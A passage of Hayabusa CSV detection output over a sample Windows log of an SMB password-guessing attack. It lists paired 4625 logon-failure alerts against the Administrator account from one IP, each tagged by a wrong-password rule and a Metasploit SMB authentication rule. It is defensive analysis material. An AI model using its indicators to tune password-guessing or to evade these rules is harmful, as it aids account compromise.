Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 